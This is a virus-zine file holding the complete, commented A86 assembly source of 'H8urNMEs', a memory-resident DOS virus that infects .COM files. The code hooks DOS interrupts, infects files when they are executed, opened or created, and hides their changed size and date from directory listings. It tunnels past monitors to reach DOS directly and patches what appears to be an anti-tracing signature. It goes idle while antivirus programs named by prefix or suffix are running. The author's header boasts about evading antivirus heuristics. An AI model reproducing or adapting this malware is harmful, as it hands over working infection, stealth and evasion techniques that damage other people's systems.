Virus Labs & Distribution
VLAD #5 - H8urNMEs


;       .H8YOurNMEs. Virus by Sepultura

;       Before you, you have the third virus I have released.
;       It is a .CO? infector of COM type files. 1173 bytes long.
;       Some may scoff at this virus and its simplicity.
;       Admittedly the code is full of rubbish, redundant instructions,
;       and poor programming techniques. However life is an ongoing
;       learning process. I have written approximately 20 viruses.
;       This however is only the third I have released. This is because 
;       the other 17 or so were once again part of the learning process
;       and were simply programming exercises. Those who scoff can 
;       wallow in their foolishness and lack of appreciation of 
;       the pursuit of knowledge.

;       But now on to the virus.
;       This virus infects on ah=4b, ah=6c, ah=3c, ah=3d / int 21
;       It therefore is fairly virulent. 
;       It marks infected files using the typical adding 100 to the
;       years field.
;       On ah=11, ah=12, ah=4e, ah=4f / int 21, the virus intercepts
;       and restores the original file length and date.
;       This is my first size stealthing virus, and was one of my
;       two goals in writing this. The size stealthing is _SLIGHTLY_
;       different from any other size stealther I have seen before.
;       This is because 11,12,4e,4f all share the same handler rather
;       than having a separate one for FCB's and ASCII's. This is also
;       slightly smaller. 
;       When a file starting with 'F-','IV','ND' or ending with 'SK','AV'
;       is executed the stealth and infection will be disabled until the
;       program terminates.

;       It tunnels through int 21 code, but instead of 
;       using a typical 
;                       cmp seg, wanted_seg / jb found_seg
;       it searches for the segment that is terminated with an IRET, and
;       returns the entry point of that segment. This is more effective
;       when DOS is loaded high.
;       The second goal of writing this virus is to write a virus with 
;       no heuristic flags, which is _NOT_ encrypted. This works 
;       perfectly with TBAV and (of course) F-PROT, but alas, I still can
;       not beat AVP. My regards to the authors for writing one of the
;       few _DECENT_ av programs out there.
;       The virus will use UMB's if they are available.
;       The reason I am not using encryption is because I do not have time
;       to write a polymorphic engine, and in my opinion normal encryption
;       is as effective as _NO_ encryption, because there is still a search
;       string. There is nothing else remarkable about this virus.
;       It requires the A86 assembler.

;       Greets: Qark, M3t4bolis (ill stay awake longer then u on irc 1day =))
;               Slash, The Unforgiven, Redback.

;       BTW: Sepultura: (Latin) One who is burying, putting in the grave.


        radix 16                                ; A86: every numeric literal below is hexadecimal

        length          equ     end - start     ; size of the virus body in bytes
        mem_length      equ     ((length + length) / 10) + 1    ; paragraphs (16-byte units) taken from the last MCB: twice the body size, plus one
        
        dta_date        equ     18              ; offset of the packed date word in a find-first/next DTA (ASCII search layout)
        dta_size        equ     1a              ; offset of the 32-bit file size in the same DTA

        hundred         equ 0c8                 ; 200 = 100 << 1: the 7-bit year field starts at bit 1 of the date's high byte,
                                                ; so adding this to dh adds 100 to the year (the infection marker from the header)
        
        org 100                                 ; COM image: code starts at PSP:100h

;-----------------------------------------------------------------------
; Entry point of an infected .CO? file (the body sits at the start of
; the host).  Asks the resident copy whether it is installed (ah=0FFh);
; if not, finds DOS's int 21h entry (site), carves mem_length paragraphs
; from the top of the last MCB, copies the body there and hooks int 21h
; and int 20h.  In both cases control ends up in is_return (ah=0FEh),
; which puts the host's original bytes back and runs it.
; The `jmp $+3 / db xx` pairs skip one dead byte; presumably padding
; meant to avoid heuristic flags (a goal stated in the header).
; The writes to prefuck0 are self-modifying code: the word at that
; label is rewritten twice (20CDh, then back to the 1EBh `jmp $+3`).
;-----------------------------------------------------------------------
start: mov     W[prefuck0],020cd               ; self-modifying, see header comment

prefuck0:jmp     $+3
        db      080
        mov     ah,0ff                          ; residency probe: is_resident answers with ax=0
        int     21
        
        mov     W[prefuck0],01eb                ; restore the jmp $+3 encoding at prefuck0
        or      ax,ax
        jnz     not_installed                   ; ax unchanged -> nobody answered the probe
        
        jmp     $+3
        db      080
        mov     ah,0fe                          ; already resident: hand control to the host (is_return)
        int     21

not_installed:        
        call    site                            ; fills site_traced_off/seg with DOS's int 21h entry

        jmp     $+3
        db      080
        mov     ah,13                           ; int 2Fh/13h: returns the int 13h vector DOS keeps in es:bx
        int     2f
        
        mov     cs:orig_13_off,bx
        mov     cs:orig_13_seg,es               ; used by infector for its own int 13h while writing
        
        jmp     $+3
        db      0b8
        int     2f                              ; second 2Fh/13h call (ah still 13h): presumably puts the vectors back

        mov     ax,3521
        int     21
        mov     cs:prev_21_off,bx               ; previous int 21h handler: target of the far jump at exit_21f
        mov     cs:prev_21_seg,es
        
        mov     ax,3520
        int     21
        mov     cs:int_20_off,bx                ; previous int 20h handler: target of the far jump in int20_handler
        mov     cs:int_20_seg,es
        
        mov     ah,52                           ; es:bx = DOS list of lists
        int     21
        
        mov     ax,es:[bx-2]                    ; word before it = segment of the first MCB
             
mcb_loop:        
        mov     ds,ax                           ; ds = current MCB
        
        add     ax,[3]                          ; [3] = block size in paragraphs
        inc     ax                              ; ax = segment of the next MCB
        
        jmp     $+3
        db      0c7
        cmp     byte ptr [0],'Z'                ; 'Z' marks the last block of the chain
        jne     mcb_loop
        
        push    ds
        mov     ds,ax
        jmp     $+3
        db      0c7
        cmp     byte ptr [0],'M'                ; another chain starts right after it (presumably the UMB chain the header mentions)?
        pop     ds
        je      mcb_loop
        
        mov     bx, mem_length
        
        jmp     $+3
        db      080
        sub     [3],bx                          ; shrink the last MCB (ds) by mem_length paragraphs
        sub     ax,bx                           ; ax = first paragraph of the carved area
        sub     ax,10                           ; so that es:100h addresses it (matches org 100)
        cmp     ax,0a000
        ja      not_low                         ; area is above conventional memory: PSP untouched
        
        jmp     $+3
        db      080
        sub     cs:W[2],bx                      ; lower the host PSP's top-of-memory segment as well
        
not_low:mov     es,ax
        mov     di,100
        mov     si,di
        mov     cx,length
        mov     ds,cs
        rep     movsb                           ; copy the body into the carved area
        
        mov     ax,2521
        int     1                               ; NOTE(review): `int 1`, not 21h; with the vector restored by site this presumably does nothing
        mov     ds,es
        mov     dx,offset int21_handler
        int     21                              ; int 21h -> resident int21_handler

        mov     ax,2520
        mov     dx,offset int20_handler
        int     21                              ; int 20h -> resident int20_handler

        jmp     $+3
        db      080
        mov     ah,0fe                          ; now resident: hand control to the host (is_return)
        int     21

;-----------------------------------------------------------------------
; Stealth path of the int 21h hook for ah=11h/12h/4Eh/4Fh.  Entered
; from int21_handler with that handler's own pushf still on the stack.
;-----------------------------------------------------------------------
call_sizer:
        popf                                    ; drop the handler's pushf
        call    sizer                           ; performs the DOS call and patches the DTA
        push    cs:W[flags]                     ; flags DOS returned, captured by sizer
        popf
        retf    2                               ; back to the int 21h caller, discarding its pushed flags
        
db      '[H8YourNMEs]',  0                      ; clear-text strings carried in every infected file and in the resident copy
db      'SpLr',     0 
;-----------------------------------------------------------------------
; Resident int 21h hook.  Dispatches on ah; anything not listed falls
; through to the previous handler via the far jump at exit_21f.
;   4Ch / 00h         program exit: clears in_badprog, then chains
;   (in_badprog = 1)  stealth and infection are skipped until exit
;   0FEh / 0FFh       private functions: return to host / residency probe
;   11h 12h 4Eh 4Fh   directory searches: size/date stealth (call_sizer)
;   4Bh 3Dh 3Ch 6Ch   exec/open/create: inf_file, ds:dx = filename
;                     (6Ch carries it in ds:si, copied to dx first)
;-----------------------------------------------------------------------
int21_handler:
        pushf                                   ; popped at exit_21f or in call_sizer
        
        cmp     ah,4c
        jz      is_exit

        cmp     ah,0
        jnz     not_exit

is_exit:mov     cs:B[in_badprog],0              ; the flagged program terminated: re-enable stealth and infection
        jmp     exit_21f

not_exit:
        cmp     cs:B[in_badprog],1
        jz      exit_21f                        ; disabled while a program from the badprogs/badproge lists runs
        cmp     ah,0fe
        je      is_return
        
        cmp     ah,0ff
        je      is_resident
        
        cmp     ah,04e
        je      call_sizer
        
        cmp     ah,04f
        je      call_sizer
        
        cmp     ah,012
        je      call_sizer
        
        cmp     ah,011
        je      call_sizer

        call    push_regs                       ; every register is preserved around inf_file

        jmp     $+3
        db      0c7                             ; dead byte skipped by the jmp above
        cmp     ah,04b
        je      call_inf
        
        cmp     ah,03d
        je      call_inf
        
        cmp     ah,03c
        je      call_inf
        
        cmp     ah,6c
        jne     exit_21
        
        mov     dx,si                           ; extended open (6Ch): filename is in ds:si

call_inf:
        call    inf_file

exit_21:call    pop_regs

exit_21f:        
        popf
        
                db      0ea                     ; jmp far; the target is filled in at install time
prev_21_off     dw      0
prev_21_seg     dw      0

;-----------------------------------------------------------------------
; ah=0FEh: hand control to the host.  Only ever called from the body at
; the start of an infected program, so the cs popped below is the
; host's PSP segment.  Copies the host's original first `length` bytes
; (stored right after the body, at 100h + file_length) back to 100h and
; jumps there.
;-----------------------------------------------------------------------
is_return:  
        add     sp,4                            ; drop the handler's pushf and the int frame's ip
        pop     ax                              ; caller's cs = host PSP
        mov     ds,ax
        mov     es,ax
        mov     ss,ax
        mov     sp,0ffee                        ; fresh stack near the top of the segment
        mov     si,word file_length             ; original host size recorded by infector
        mov     di,100
        add     si,di                           ; ds:si = saved copy of the host's first bytes
        push    ds
        push    di                              ; cs:ip = PSP:100h for the iret below
        mov     cx,length
        repz    movsb                           ; restore the host's first `length` bytes at 100h
        iret                                    ; jumps to PSP:100h; the flags word is whatever lies at ss:0FFEEh

is_resident:                                    ; ah=0FFh residency probe: ax=0 tells the caller the virus is installed
        xor     ax,ax
        popf
        iret

;-----------------------------------------------------------------------
; Filter for exec/open/create.  ds:dx = ASCIIZ filename, ah = function.
; A file whose extension starts with "co" goes to infector.  On exec
; (4Bh) the name is also compared with the badproge (suffix) and
; badprogs (prefix) word lists; on a match in_badprog is set so stealth
; and infection stop until that program exits (see the header).
; `jz ret` / `jnz ret` are A86 shorthand for jumping to a nearby ret.
;-----------------------------------------------------------------------
inf_file: 
        mov     si,dx
        mov      cs:[ff_ah],ah                  ; remember which function brought us here
        mov     ah,'.'
        
o_next_char: 
        lodsb
        or      al,al
        jz      ret                             ; no '.' in the name: nothing to do
        cmp     al,ah
        jne     o_next_char
        
        mov     es,cs
          
        cld
        lodsw                                   ; first two extension characters
        or      ax,2020                         ; lower-case them
        cmp     ax,'oc'                         ; ".co?" (A86 stores the word constant with the characters swapped)
        jz      infector

        cmp     cs:B[ff_ah],4b
        jnz     ret                             ; only exec is checked against the name lists
        
        sub     si,5                            ; si -> the two characters before the '.'
        mov     di,offset badproge
        lodsw
        or      ax,2020
        scasw                                   ; name ends in one of the badproge pairs?
        jz      bad_prog
        scasw
        jz      bad_prog

        mov     di,offset badprogs
        mov     cx,4
        mov     si,dx                           ; back to the start of the string as passed by the caller
        lodsw
        or      ax,2020
        cld
chk_start:
        scasw                                   ; starts with one of the four badprogs pairs?
        jz      bad_prog
        loop    chk_start

        ret

bad_prog:
        mov     cs:B[in_badprog],1              ; cleared again by the exit (4Ch/00h) and int 20h hooks
        ret
        
;-----------------------------------------------------------------------
; Infects the .CO? file named by ds:dx.  Leaves alone: COMMAND (name
; compared with command_com), files already marked (date high byte >
; hundred), files starting with "MZ", and files smaller than the body
; or too large for a COM image.  DOS is reached with `int 3`: int 3 is
; pointed at the int 21h entry found by site (site_traced_off), so
; these calls bypass anything hooked in front of DOS.  Int 24h is
; replaced so critical errors are ignored, and int 13h is set to the
; vector obtained through int 2Fh at install time.
; Resulting file layout: [body][rest of host][host's first `length`
; bytes]; the date gets +100 years as infection marker.
;-----------------------------------------------------------------------
infector:
        mov     cs:B[in_badprog],0
        sub     si,0a                           ; si -> 7 characters before the '.'
        
        mov     es,cs
        mov     di,offset command_com
        mov     cx,7

name_test: 
        lodsb
        or      al,20                           ; case-insensitive compare with "command"
        scasb
        loope   name_test
        if e    ret                             ; A86: all 7 matched -> COMMAND.COM is not infected
        
        mov     cs:file_name_ds,ds
        mov     ds,cs
        mov     file_name_dx,dx                 ; keep the caller's ds:dx filename pointer
        
        mov     ax,3503
        int     21
        
        mov     int_3_seg,es                    ; save int 3 ...
        mov     int_3_off,bx
        
        lds     dx, site_traced_off
        mov     ax,2503                         ; ... and point it at the traced DOS entry
        int     21

        mov     ds,cs

        mov     ax,3524
        int     3                               ; from here on `int 3` is a direct int 21h call
        
        mov     int_24_seg,es
        mov     int_24_off,bx
        
        mov     dx,offset int24_handler         ; critical errors (e.g. write-protected media) are silently ignored
        mov     ax,2524
        int     3
        
        mov     ax,3513
        int     3

        mov     int_13_off,bx
        mov     int_13_seg,es

        lds     dx,orig_13_off                  ; int 13h = vector obtained via int 2Fh/13h at install time
        mov     ax,2513
        int     3
        
        mov     B[prefuck4],0c3                 ; self-modifying: a `ret` opcode is written over the nop, then a nop again
prefuck4:nop
        mov     B[prefuck4],90


        cs:lds  dx,file_name_dx
        mov     ax,03d02                        ; open read/write
        int     3
        if c    jmp e_f_nc                      ; A86: open failed -> only restore the vectors
        xchg    bx,ax                           ; bx = handle
        
        mov     ax,5700                         ; get file date/time
        int     3
        mov     cs:file_date,dx
        mov     cs:file_time,cx
        cmp     dh, hundred
        ja      exit_infector                   ; already carries the +100-years marker
        
        mov     ax,4300
        int     3
        cs:mov  file_attribs,cx                 ; save the attributes ...
        
        xor     cx,cx
        mov     ax,4301                         ; ... and clear them (read-only would block the writes)
        int     3
        
        mov     cx,length
        mov     ds,cs
        mov     dx,offset end
        mov     ah,03f                          ; read the host's first `length` bytes into the area after the body
        int     3
        
        mov     es,cs        
        
        jmp     $+3
        db      080
        cmp     W[end],'ZM'                     ; EXE header behind a .CO? name: leave it
        jz      exit_infector
        
        xor     cx,cx
        cwd
        mov     ax,4202                         ; seek to end: ax = file size
        int     3
        
        cmp     ax,length
        jb      exit_infector                   ; smaller than the body
        
        cmp     ax,0feff - length
        jnb     exit_infector                   ; would not fit in a 64K COM image
        
        mov     cs:W[file_length],ax            ; original size, needed by is_return
        
        mov     ah,40
        mov     cx,length
        mov     dx,offset end                   ; append the saved original first bytes
        int     3
        
        xor     cx,cx
        cwd
        mov     ax,4200                         ; seek to offset 0
        int     3
        
        mov     ah,40
        mov     dx,start
        mov     cx,length                       ; overwrite the start of the file with the body
        int     3
                
        mov     cs:dx,file_date
        add     dh,hundred                      ; +100 years: the infection marker
        jmp     h_added

exit_infector: 
        mov     cs:dx,file_date
        
h_added:mov     ax,5701                         ; put the (possibly marked) timestamp back so the write is not visible
        mov     cs:cx,file_time
        int     3

        mov     ah,03e                          ; close
        int     3
        lds     cs:dx,file_name_dx
        
e_f_nc: mov     ax,4301
        mov     cs:cx,file_attribs              ; restore the original attributes
        int     3
        
        lds     cs:dx,int_24_off
        mov     ax,2524
        int     3
        
        lds     cs:dx,int_13_off
        mov     ax,2513
        int     3

        lds     cs:dx,int_3_off
        mov     ax,2503                         ; int 3 restored last, through the normal int 21h chain
        int     21
         
        ret

;-----------------------------------------------------------------------
; Size/date stealth for the directory-search functions (11h/12h FCB,
; 4Eh/4Fh ASCII).  The pushf plus the far call through site_traced_off
; emulate an `int 21h` straight into DOS; the flags DOS returns are kept
; in `flags` for call_sizer.  When a match is found and the entry
; carries the infection marker, its date and size are restored to the
; pre-infection values.  di = extra offset of the directory data inside
; the DTA: 1 for FCB searches (presumably a drive byte precedes the
; directory entry there), +7 for an extended FCB, 0 for ASCII searches.
;-----------------------------------------------------------------------
sizer:  pushf                                   ; flags word of the emulated int frame
        mov     cs:B[ff_ah],ah
        
        cmp     ah,4d
        ja      ascii                           ; 4Eh/4Fh
        
        call    cs:D[site_traced_off]           ; FCB search, directly in DOS
        
        pushf
        pop     cs:W[flags]
        call    push_regs        

        or      al,al                           ; FCB functions report "not found" in al
        jnz     exit_sizer
        
        mov     di,1
        jmp     ff_same

ascii:  call    cs:D[site_traced_off]           ; ASCII search, directly in DOS
        
        pushf
        pop     cs:W[flags]
        call    push_regs        
        jc      exit_sizer                      ; ASCII functions report "not found" with CF
        
        xor     di,di

ff_same:mov     ah,2f                           ; es:bx = current DTA
        int     21
       
        cmp     es:B[bx],0ff                    ; extended FCB: 7-byte prefix
        if e    add di,7
        
        add     bx,di
        mov     ax,es:[bx+dta_date]
        cmp     ah,hundred
        jb      exit_sizer                      ; not marked: leave the entry alone
        sub     ah, hundred                     ; hide the +100-years marker
        mov     es:W[bx+dta_date],ax
        cmp     cs:B[ff_ah],4c
        if b    inc bx,2                        ; A86: FCB layout keeps the size two bytes further on
        sub     es:W[bx+dta_size],length
        sbb     es:W[bx+dta_size+2],0           ; 32-bit size minus the body

exit_sizer:
        call    pop_regs
        ret

int24_handler:                                  ; critical-error handler installed while infecting
        mov     al,0                            ; 0 = ignore: no "Abort, Retry, Fail?" prompt reaches the user
        iret


int20_handler:                                  ; int 20h hook: program exit also clears the "bad program" flag
        mov     cs:B[in_badprog],0
                
                db      0ea                     ; jmp far to the saved int 20h vector
int_20_off      dw      0
int_20_seg      dw      0

;-----------------------------------------------------------------------
; Find DOS's int 21h entry point by single-stepping (int 1) through
; the handler chain with an ah=52h call; site_iret does the per-step
; work and stores the result in site_traced_off/seg.  Afterwards int 1
; is restored and, if site_iret patched a byte (tb_patched), the
; original 74h is written back.  Clobbers ax, dx, di, ds, es; leaves
; interrupts enabled and DF clear.
;-----------------------------------------------------------------------
site:   clc                                        
        mov     ax,3501                            
        int     21                                 
        mov     site_int1_seg,es                   ; save the int 1 (single-step) vector
        mov     site_int1_off,bx                          
        
        jmp     $+3
        db      0
        mov     ax,2501                            
        mov     dx,offset site_iret                ; int 1 -> site_iret
        int     21                                 
        pushf                                      ; flags word of the emulated int frame for the far call below
        pushf                                      
        pop     ax                                 
        or      ah,01                              ; set TF ...
        push    ax                                 
        popf                                       ; ... so the far call is traced step by step
        xor     ax,ax
        mov     ds,ax
        
        mov     ah,52
        ds:call far [84]                           ; call through the int 21h vector at 0:84h

        mov     ax,cs                              
        mov     ds,ax                              
        mov     es,ax                              
        
        jmp     $+3
        db      0
        mov     ax,2501                            
        lds     dx,cs:site_int1_off                ; restore int 1
        int     21                                 
        cld                                        
        sti                                        
        
        and     cs:B[tb_patched],1
        jz      ret                                ; A86: nothing was patched
        
        mov     cs:B[tb_patched],0
        les     di,cs:tb_patched_off
        mov     al,74
        stosb                                      ; put the original 74h opcode back
        ret

;-----------------------------------------------------------------------
; Int 1 (single-step) handler used by site.  For each traced
; instruction at ds:si it remembers the first address seen in each new
; segment (site_prev_*).  When the instruction is an IRET (0CFh) that
; first address is taken as the int 21h entry (site_traced_*) and TF is
; cleared; otherwise TF is kept set in the saved flags at [bp+7].  On
; every step the code is also compared with site_anti_trace_sig; on a
; match the byte that follows the matched bytes is overwritten with
; 0EBh (jmp short) and the location recorded so site can restore it.
;-----------------------------------------------------------------------
site_iret: 
        push    bp                                 
        mov     bp,sp                              
        call    push_regs 
        
        lds     si,ss:[bp+2]                       ; ds:si = cs:ip of the instruction about to execute
        
        mov     ax,ds
        cmp     cs:site_prev_seg,ax
        jz      site_same_seg
        mov     cs:site_prev_seg,ds                ; new segment: remember where it was entered
        mov     cs:site_prev_off,si

site_same_seg: 
        cmp     B[si],0cf                          ; IRET?
        jz      site_is_iret_seg
        
        or      byte ptr [bp+07],01                ; keep TF set in the flags of the int frame
        
site_exit_int1: 
        mov     cx,0d
        mov     es,cs
        mov     di,offset site_anti_trace_sig
        repz    cmpsb                              ; compare 13 bytes; on a match si -> the byte after them
        jnz     no_tb
        
        mov     byte ptr [si],0eb                  ; patch that byte (a 74h in the signature) to jmp short
        mov     cs:B[tb_patched],1
        mov     cs:tb_patched_off,si
        mov     cs:tb_patched_seg,ds

no_tb:  call    pop_regs
        pop     bp
        iret                                       

site_is_iret_seg:
        lds     si,cs:site_prev_off                ; entry of the segment that ends in IRET = the int 21h entry we want
        mov     cs:W[site_traced_off],si
        mov     cs:W[site_traced_seg],ds
        and     B[bp+07],0fe                       ; clear TF: tracing is done
        jmp     site_exit_int1

push_regs:                                      ; save ax..dx, si, di, bp, ds, es beneath the return address (A86 multi-push)
        pop     cs:W[seg_ret]                   ; lift the return address off the stack ...
        
        push    ax,bx,cx,dx
        push    si,di,bp
        push    ds,es
        
        push    cs:W[seg_ret]                   ; ... and put it back on top
        ret
        
pop_regs:                                       ; inverse of push_regs: restore es, ds, bp, di, si, dx..ax
        pop     cs:W[seg_ret]                   ; lift the return address off the stack ...
        
        pop     es,ds        
        pop     bp,di,si
        pop     dx,cx,bx,ax

        push    cs:W[seg_ret]                   ; ... and put it back on top
        ret

site_anti_trace_sig: db 0fa, 09c, 0fc, 053, 050, 093, 058, 04c, 04c, 05b, 03b, 0c3, 05b, 074   ; code pattern matched by site_iret (13 bytes compared; the 74h is the byte it patches)

badprogs        dw      'tx','-f','dn','vi'     ; name prefixes; A86 word constants hold the characters swapped, so '-f' matches "F-" (see header)
badproge        dw      'ks','va'               ; name suffixes, same encoding ("SK", "AV")

command_com     db      'command'               ; COMMAND.COM is never infected

tb_patched      db      0                       ; 1 while site_iret's byte patch is in place
in_badprog      db      0                       ; 1 while a program from the lists above runs: no stealth, no infection
ff_ah           db      0                       ; ah of the intercepted int 21h call

file_length     dw      length - 2              ; size of the host before infection; rewritten by infector (generation-zero value here)

flags           dw      0                       ; flags DOS returned for a stealthed search function

seg_ret         dw      0                       ; scratch return address for push_regs/pop_regs

tb_patched_off  dw      0                       ; where site_iret wrote the 0EBh byte
tb_patched_seg  dw      0

int_3_off       dw      0                       ; vectors saved while infecting (int 3, 13h, 24h)
int_3_seg       dw      0

int_13_off      dw      0
int_13_seg      dw      0

int_24_off      dw      0
int_24_seg      dw      0

orig_13_off     dw      0                       ; int 13h vector obtained via int 2Fh/13h at install time
orig_13_seg     dw      0

site_int1_off   dw      0                       ; original int 1 vector (site)
site_int1_seg   dw      0

site_traced_off dw      0                       ; DOS int 21h entry found by site; target of the direct calls
site_traced_seg dw      0

site_prev_off   dw      0                       ; first traced address in the current segment (site_iret)
site_prev_seg   dw      0

file_name_dx    dw      0                       ; caller's ds:dx filename pointer (infector)
file_name_ds    dw      0

file_attribs    dw      0                       ; attributes, date and time of the file being infected
file_date       dw      0
file_time       dw      0

end:                                            ; end of the body; in an infected file the host's original first `length` bytes follow
int 20
